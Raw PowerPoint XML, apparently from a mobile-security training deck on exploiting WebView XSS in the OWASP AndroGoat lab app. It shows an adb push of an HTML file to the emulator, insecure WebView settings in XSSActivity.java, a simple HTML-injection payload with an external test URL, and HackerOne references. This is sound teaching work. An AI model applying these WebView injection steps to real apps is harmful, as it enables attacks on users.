            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>happens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ad push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x5s_ext.html: 1 file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. 0.0 MB/s (573 bytes in 0.019s)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>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797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14C560-7819-9936-9CA5-698C4F1E3B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011252" y="1341121"/>
            <a:ext cx="4653668" cy="5033006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22785429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Affected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>XSSActivity.java</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>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webSettings1.setJavaScriptEnabled(</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webSettings1.setAllowUniversalAccessFromFileURLs(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webSettings1.setAllowFileAccessFromFileURLs(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webSettings1.setAllowFileAccess(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webSettings1.setAllowContentAccess(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webSettings1.setJavaScriptCanOpenWindowsAutomatically(</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webSettings1.setDomStorageEnabled(</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webSettings1.setLoadwithoverviewMode(</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webSettings1.supportMultipleWindows();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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7573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Affected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>XSSActivity.java</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Intrinsics.checkExpressionvalueIsNotNull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(webSettings2,"webSettings2");</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webSettings2.setJavaScriptEnabled(</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webSettings2.setAllowUniversalAccessFromFileURLs(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webSettings2.setAllowFileAccessFromFileURLs(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p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webSettings2.setAllowFileAccess(</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a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>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455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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>The application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>webView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> HTML code. Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> check if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>holes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Twitter lite XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>hackerone.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/reports/499348</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>ownCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>hackerone.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/reports/87835</a:t>
            </a:r>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6 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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4011847" y="5413338"/>
            <a:ext cx="924164" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>NA</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872868" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>1120 $</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7025421F-1E0B-4F1E-B290-FB484DD75469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2887" t="34670" r="49992" b="34917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477326" y="5807195"/>
            <a:ext cx="1089025" cy="527844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="505646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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Confirming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> the XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;h1&gt;Hello&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>URL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tmmmmmr.github.io/xss_1.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"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44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fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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9B298A-2413-4146-B007-E9BE122001E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267075" y="2200780"/>
            <a:ext cx="2381250" cy="4171950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1774666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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Confirming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> the XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>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p>
          <a:p>
            <a:pPr marL="0" indent="0">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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="23684"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="408833" y="2752725"/>
            <a:ext cx="5353050" cy="552450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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4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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Free versions :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Android Virtual Device (AVD)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Official android emulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Android x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: An x86 port of the Android code base </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Commercial versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Genymotion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Mature emulator with many features, both as local and cloud-based solution (free version available for non-commercial use)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Corellium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: Offers custom device virtualization through a cloud-based or on-prem solution</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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fr-FR" err="1"/>
              <a:t>Emulator</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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9285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fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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964305-12B0-4B9D-9958-32CC4290232B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381375" y="2301875"/>
            <a:ext cx="2381250" cy="4210050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160708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400" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
